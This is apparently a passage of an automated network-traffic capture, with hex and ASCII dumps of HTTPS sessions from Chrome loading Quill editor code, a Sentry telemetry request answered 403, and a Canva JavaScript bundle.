                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 72 2e 6f 6e 28 66 2e 61 2e 65 76 65 6e 74 73 2e 45 44 49 54 4f 52 5f 43 48 41 4e 47 45 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 3d 3d 66 2e 61 2e 65 76 65 6e 74 73 2e 54 45 58 54 5f 43 48 41 4e 47 45 26 26 6e 2e 72 6f 6f 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 71 6c 2d 62 6c 61 6e 6b 22 2c 6e 2e 65 64 69 74 6f 72 2e 69 73 42 6c 61 6e 6b 28 29 29 7d 29 29 2c 74 68 69 73 2e 65 6d 69 74 74 65 72 2e 6f 6e 28 66 2e 61 2e 65 76 65 6e 74 73 2e 53 43 52 4f 4c 4c 5f 55 50 44 41 54 45 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 6e 2e 73 65 6c 65 63 74 69 6f 6e 2e 6c 61 73 74 52 61 6e 67 65 2c 69 3d 67 28 6e 2e 73 65 6c 65 63 74 69 6f 6e 2e 67 65 74 52 61 6e 67 65 28 29 2c 31 29 5b 30 5d 2c 73 3d 6f 26 26 69 3f
                                                                                                                                                                                                                                                    Data Ascii: r.on(f.a.events.EDITOR_CHANGE,(function(t){t===f.a.events.TEXT_CHANGE&&n.root.classList.toggle("ql-blank",n.editor.isBlank())})),this.emitter.on(f.a.events.SCROLL_UPDATE,(function(t,e,r){var o=n.selection.lastRange,i=g(n.selection.getRange(),1)[0],s=o&&i?
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 65 6e 61 62 6c 65 28 74 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 71 6c 2d 64 69 73 61 62 6c 65 64 22 2c 21 74 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 63 75 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 2e 73 63 72 6f 6c 6c 54 6f 70 3b 74 68 69 73 2e 73 65 6c 65 63
                                                                                                                                                                                                                                                    Data Ascii: ,e}},{key:"enable",value:function(){var t=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.scroll.enable(t),this.container.classList.toggle("ql-disabled",!t)}},{key:"focus",value:function(){var t=this.scrollingContainer.scrollTop;this.selec
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 62 6f 74 74 6f 6d 3a 65 2e 62 6f 74 74 6f 6d 2d 72 2e 74 6f 70 2c 68 65 69 67 68 74 3a 65 2e 68 65 69 67 68 74 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2c 72 69 67 68 74 3a 65 2e 72 69 67 68 74 2d 72 2e 6c 65 66 74 2c 74 6f 70 3a 65 2e 74 6f 70 2d 72 2e 74 6f 70 2c 77 69 64 74 68 3a 65 2e 77 69 64 74 68 7d 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 43 6f 6e 74 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 2c 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65
                                                                                                                                                                                                                                                    Data Ascii: getBoundingClientRect();return{bottom:e.bottom-r.top,height:e.height,left:e.left-r.left,right:e.right-r.left,top:e.top-r.top,width:e.width}}},{key:"getContents",value:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,e=arguments.le
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 6e 2e 67 65 74 52 61 6e 67 65 28 29 5b 30 5d 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 53 65 6d 61 6e 74 69 63 48 54 4d 4c 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 2c 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 74 68 69 73 2e 67 65 74 4c 65 6e 67 74 68 28 29 2d 74 2c 6e 3d 67 28 54 28 74 2c 65 29 2c 32 29 3b 72 65 74 75 72 6e 20 74 3d 6e 5b 30 5d 2c 65 3d 6e 5b 31 5d 2c 74 68 69 73 2e 65 64 69 74 6f 72 2e 67 65 74 48 54 4d 4c 28 74 2c 65
                                                                                                                                                                                                                                                    Data Ascii: n.getRange()[0]}},{key:"getSemanticHTML",value:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.getLength()-t,n=g(T(t,e),2);return t=n[0],e=n[1],this.editor.getHTML(t,e
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 64 69 74 6f 72 2e 72 65 6d 6f 76 65 46 6f 72 6d 61 74 28 74 2c 65 29 7d 29 2c 6e 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 6c 65 63 74 69 6f 6e 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 74 68 69 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 29 7d 7d 2c 7b 6b 65 79 3a 22 73 65 74 43 6f 6e 74 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 66 2e 61 2e 73 6f 75
                                                                                                                                                                                                                                                    Data Ascii: n(){return r.editor.removeFormat(t,e)}),n,t)}},{key:"scrollIntoView",value:function(){this.selection.scrollIntoView(this.scrollingContainer)}},{key:"setContents",value:function(t){var e=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:f.a.sou
                                                                                                                                                                                                                                                    2024-12-19 21:27:24 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 61 2e 67 65 74 28 74 29 7c 7c 4f 2e 66 69 6e 64 28 74 29 7d 7d 2c 7b 6b 65 79 3a 22 69 6d 70 6f 72 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 68 69 73 2e 69 6d 70 6f 72 74 73 5b 74 5d 26 26 45 2e 65 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 69 6d 70 6f 72 74 20 22 2e 63 6f 6e 63 61 74 28 74 2c 22 2e 20 41 72 65 20 79 6f 75 20 73 75 72 65 20 69 74 20 77 61 73 20 72 65 67 69 73 74 65 72 65 64 3f 22 29 29 2c 74 68 69 73 2e 69 6d 70 6f 72 74 73 5b 74 5d 7d 7d 2c 7b 6b 65 79 3a 22 72 65 67 69 73 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e
                                                                                                                                                                                                                                                    Data Ascii: nction(t){return d.a.get(t)||O.find(t)}},{key:"import",value:function(t){return null==this.imports[t]&&E.error("Cannot import ".concat(t,". Are you sure it was registered?")),this.imports[t]}},{key:"register",value:function(t,e){var n=this,r=arguments.len


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    17192.168.2.44975934.120.195.249443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:25 UTC478OUTGET /api/6097940/envelope/?sentry_key=2bfedc9d03674aacac8aa2762f22fefd&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: o13855.ingest.sentry.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:26 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:25 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 548
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:26 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    18192.168.2.449761104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC622OUTGET /web/19jbs9.7484ddd0951f6659.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 1435612
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0d0f3b4407-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 64960
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "caa1ecece273993811877d1207762a37"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: mX62SLHKUAcjkPCEpkQUDhGit3Eztf/4JAkEQQcFeo/zqr514plSTaS73LJGs/9KNqpVoq7C0gU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: SHFG7B9E509YF95B
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: aJqc3epwcgjccL8qN.5HblWaw5b_Fcrm
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 7a 37 51 70 4d 6d 64 70 54 49 6a 73 62 41 4f 77 6a 44 49 6e 62 56 64 51 32 7a 39 59 32 39 59 59 5a 62 59 5a 48 4f 79 74 61 6b 42 34 53 78 47 74 56 4e 72 55 63 44 66 4b 54 55 30 44 50 37 38 59 70 46 42 67 52 41 36 33 67 33 38 66 4d 42 76 46 70 4f 38 36 67 4e 67 32 54 6c 50 41 52 51 41 64 58 33 25 32 46 53 65 25 32 42 45 32 53 44 75 64 36 51 78 25 32 42 37 64 45 5a 4e 36 69 6b 53 49 54 25 32 46 25 32 42 25 32 46 67 67 34 6d 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7QpMmdpTIjsbAOwjDInbVdQ2z9Y29YYZbYZHOytakB4SxGtVNrUcDfKTU0DP78YpFBgRA63g38fMBvFpO86gNg2TlPARQAdX3%2FSe%2BE2SDud6Qx%2B7dEZN6ikSIT%2F%2B%2Fgg4mQ%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 38 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 38 31 33 31 31 30 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 73 65 6c 66 2e 5f 66 65 34 64 39 39 65 62 65 30 64 32 64 32 35 39 36 34 36 61 38
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{/***/ 813110:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a8
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2c 4a 61 2c 4b 61 2c 4c 61 2c 4e 61 2c 4f 61 2c 58 61 2c 66 62 2c 64 62 2c 5a 61 2c 61 62 2c 62 62 2c 63 62 2c 65 62 2c 67 62 2c 4d 61 2c 59 61 2c 6d 61 61 2c 6e 61 61 2c 6a 62 2c 6f 61 61 2c 6d 62 2c 70 61 61 2c 77 62 2c 71 61 61 2c 48 62 2c 4a 62 2c 4c 62 2c 4d 62 2c 4f 62 2c 47 62 2c 51 62 2c 52 62 2c 76 61 61 2c 53 62 2c 77 61 61 2c 78 61 61 2c 54 62 2c 55 62 2c 59 62 2c 79 61 61 2c 61 63 2c 63 63 2c 62 63 2c 42 61 61 2c 64 63 2c 6a 63 2c 69 63 2c 43 61 61 2c 73 63 2c 71 63 2c 48 61 61 2c 78 63 2c 49 61 61 2c 76 63 2c 44 63 2c 47 63 2c 4a 63 2c 50 61 61 2c 50 63 2c 52 63 2c 53 63 2c 51 61 61 2c 55 61 61 2c 54 61 61 2c 54 63 2c 52 61 61 2c 56 61 61 2c 57 61 61 2c 59 61 61 2c 62 62 61 2c 61 62 61 2c 63 62 61 2c 5a 61 61 2c 66 62 61 2c 64 64 2c 67 62 61
                                                                                                                                                                                                                                                    Data Ascii: ,Ja,Ka,La,Na,Oa,Xa,fb,db,Za,ab,bb,cb,eb,gb,Ma,Ya,maa,naa,jb,oaa,mb,paa,wb,qaa,Hb,Jb,Lb,Mb,Ob,Gb,Qb,Rb,vaa,Sb,waa,xaa,Tb,Ub,Yb,yaa,ac,cc,bc,Baa,dc,jc,ic,Caa,sc,qc,Haa,xc,Iaa,vc,Dc,Gc,Jc,Paa,Pc,Rc,Sc,Qaa,Uaa,Taa,Tc,Raa,Vaa,Waa,Yaa,bba,aba,cba,Zaa,fba,dd,gba
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 64 6b 2c 66 6b 2c 67 6b 2c 68 6b 2c 6f 6b 2c 4f 64 61 2c 71 6b 2c 50 64 61 2c 51 64 61 2c 77 6b 2c 79 6b 2c 55 64 61 2c 56 64 61 2c 41 6b 2c 52 64 61 2c 44 6b 2c 45 6b 2c 47 6b 2c 53 64 61 2c 0a 48 6b 2c 6d 6c 2c 4c 6b 2c 4f 6b 2c 73 6c 2c 75 6c 2c 57 64 61 2c 59 64 61 2c 5a 64 61 2c 61 65 61 2c 62 65 61 2c 41 6c 2c 42 6c 2c 43 6c 2c 56 6c 2c 58 64 61 2c 65 65 61 2c 5a 6c 2c 24 6c 2c 61 6d 2c 63 65 61 2c 49 6b 2c 24 64 61 2c 4c 6c 2c 4d 6c 2c 4e 6c 2c 56 6e 2c 68 65 61 2c 6b 6d 2c 6c 6d 2c 5a 6b 2c 54 64 61 2c 4b 6b 2c 6b 65 61 2c 53 6e 2c 73 6d 2c 6c 65 61 2c 6d 65 61 2c 6e 65 61 2c 6f 65 61 2c 70 65 61 2c 71 65 61 2c 72 65 61 2c 70 6f 2c 7a 6f 2c 74 65 61 2c 73 65 61 2c 69 6d 2c 6a 6d 2c 69 65 61 2c 6a 65 61 2c 77 65 61 2c 67 65 61 2c 6e 6d 2c 75 70 2c
                                                                                                                                                                                                                                                    Data Ascii: dk,fk,gk,hk,ok,Oda,qk,Pda,Qda,wk,yk,Uda,Vda,Ak,Rda,Dk,Ek,Gk,Sda,Hk,ml,Lk,Ok,sl,ul,Wda,Yda,Zda,aea,bea,Al,Bl,Cl,Vl,Xda,eea,Zl,$l,am,cea,Ik,$da,Ll,Ml,Nl,Vn,hea,km,lm,Zk,Tda,Kk,kea,Sn,sm,lea,mea,nea,oea,pea,qea,rea,po,zo,tea,sea,im,jm,iea,jea,wea,gea,nm,up,
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 41 68 61 2c 42 68 61 2c 43 68 61 2c 68 77 2c 67 77 2c 66 77 2c 44 68 61 2c 4a 68 61 2c 4b 68 61 2c 69 77 2c 4c 68 61 2c 4d 68 61 2c 4e 68 61 2c 6c 77 2c 52 68 61 2c 54 68 61 2c 6f 77 2c 56 68 61 2c 70 77 2c 71 77 2c 72 77 2c 50 68 61 2c 73 77 2c 74 77 2c 75 77 2c 76 77 2c 57 68 61 2c 58 68 61 2c 59 68 61 2c 41 77 2c 24 68 61 2c 43 77 2c 61 69 61 2c 44 77 2c 46 77 2c 64 69 61 2c 47 77 2c 48 77 2c 4b 77 2c 4c 77 2c 4d 77 2c 4e 77 2c 50 77 2c 4f 77 2c 53 77 2c 67 69 61 2c 55 77 2c 56 77 2c 57 77 2c 54 77 2c 58 77 2c 59 77 2c 5a 77 2c 61 78 2c 62 78 2c 68 69 61 2c 63 78 2c 69 69 61 2c 64 78 2c 6a 69 61 2c 6b 69 61 2c 0a 65 78 2c 66 78 2c 6d 69 61 2c 6e 69 61 2c 68 78 2c 69 78 2c 79 69 61 2c 7a 69 61 2c 6a 78 2c 6e 78 2c 6f 78 2c 41 69 61 2c 6c 78 2c 70 78 2c
                                                                                                                                                                                                                                                    Data Ascii: Aha,Bha,Cha,hw,gw,fw,Dha,Jha,Kha,iw,Lha,Mha,Nha,lw,Rha,Tha,ow,Vha,pw,qw,rw,Pha,sw,tw,uw,vw,Wha,Xha,Yha,Aw,$ha,Cw,aia,Dw,Fw,dia,Gw,Hw,Kw,Lw,Mw,Nw,Pw,Ow,Sw,gia,Uw,Vw,Ww,Tw,Xw,Yw,Zw,ax,bx,hia,cx,iia,dx,jia,kia,ex,fx,mia,nia,hx,ix,yia,zia,jx,nx,ox,Aia,lx,px,
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 61 2c 6e 6e 61 2c 6f 6e 61 2c 6d 44 2c 6f 44 2c 6e 44 2c 72 44 2c 74 44 2c 75 44 2c 71 44 2c 70 44 2c 73 44 2c 76 44 2c 71 6e 61 2c 74 6e 61 2c 75 6e 61 2c 76 6e 61 2c 42 44 2c 79 6e 61 2c 41 6e 61 2c 43 6e 61 2c 45 44 2c 46 44 2c 44 6e 61 2c 45 6e 61 2c 4b 44 2c 47 6e 61 2c 48 6e 61 2c 4a 6e 61 2c 4b 6e 61 2c 4e 6e 61 2c 4f 6e 61 2c 4e 44 2c 50 6e 61 2c 53 44 2c 56 44 2c 52 6e 61 2c 53 6e 61 2c 55 6e 61 2c 54 6e 61 2c 58 44 2c 56 6e 61 2c 58 6e 61 2c 57 6e 61 2c 24 44 2c 5a 6e 61 2c 24 6e 61 2c 61 6f 61 2c 62 6f 61 2c 63 6f 61 2c 64 6f 61 2c 65 6f 61 2c 66 6f 61 2c 67 6f 61 2c 6b 6f 61 2c 6c 6f 61 2c 67 45 2c 73 6f 61 2c 6d 6f 61 2c 6e 6f 61 2c 71 6f 61 2c 74 6f 61 2c 6c 45 2c 77 6f 61 2c 44 6f 61 2c 78 6f 61 2c 79 6f 61 2c 7a 6f 61 2c 41 6f 61 2c 42 6f
                                                                                                                                                                                                                                                    Data Ascii: a,nna,ona,mD,oD,nD,rD,tD,uD,qD,pD,sD,vD,qna,tna,una,vna,BD,yna,Ana,Cna,ED,FD,Dna,Ena,KD,Gna,Hna,Jna,Kna,Nna,Ona,ND,Pna,SD,VD,Rna,Sna,Una,Tna,XD,Vna,Xna,Wna,$D,Zna,$na,aoa,boa,coa,doa,eoa,foa,goa,koa,loa,gE,soa,moa,noa,qoa,toa,lE,woa,Doa,xoa,yoa,zoa,Aoa,Bo
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 4a 2c 69 4a 2c 6d 4a 2c 6e 4a 2c 50 73 61 2c 51 73 61 2c 53 73 61 2c 55 73 61 2c 54 73 61 2c 5a 73 61 2c 73 4a 2c 77 4a 2c 79 4a 2c 24 73 61 2c 42 4a 2c 49 4a 2c 66 74 61 2c 67 74 61 2c 45 4a 2c 46 4a 2c 47 4a 2c 48 4a 2c 68 74 61 2c 69 74 61 2c 4b 4a 2c 64 74 61 2c 65 74 61 2c 4e 4a 2c 6a 74 61 2c 6b 74 61 2c 43 4a 2c 50 4a 2c 51 4a 2c 52 4a 2c 6c 74 61 2c 53 4a 2c 54 4a 2c 55 4a 2c 6e 74 61 2c 6f 74 61 2c 56 4a 2c 6d 74 61 2c 71 74 61 2c 58 4a 2c 75 74 61 2c 61 4b 2c 24 4a 2c 77 74 61 2c 62 4b 2c 78 74 61 2c 63 4b 2c 79 74 61 2c 65 4b 2c 42 74 61 2c 7a 74 61 2c 41 74 61 2c 43 74 61 2c 44 74 61 2c 64 4b 2c 46 74 61 2c 45 74 61 2c 67 4b 2c 68 4b 2c 69 4b 2c 6a 4b 2c 48 74 61 2c 6c 4b 2c 6d 4b 2c 49 74 61 2c 6e 4b 2c 4a 74 61 2c 4b 74 61 2c 4c 74 61 2c 4d
                                                                                                                                                                                                                                                    Data Ascii: J,iJ,mJ,nJ,Psa,Qsa,Ssa,Usa,Tsa,Zsa,sJ,wJ,yJ,$sa,BJ,IJ,fta,gta,EJ,FJ,GJ,HJ,hta,ita,KJ,dta,eta,NJ,jta,kta,CJ,PJ,QJ,RJ,lta,SJ,TJ,UJ,nta,ota,VJ,mta,qta,XJ,uta,aK,$J,wta,bK,xta,cK,yta,eK,Bta,zta,Ata,Cta,Dta,dK,Fta,Eta,gK,hK,iK,jK,Hta,lK,mK,Ita,nK,Jta,Kta,Lta,M
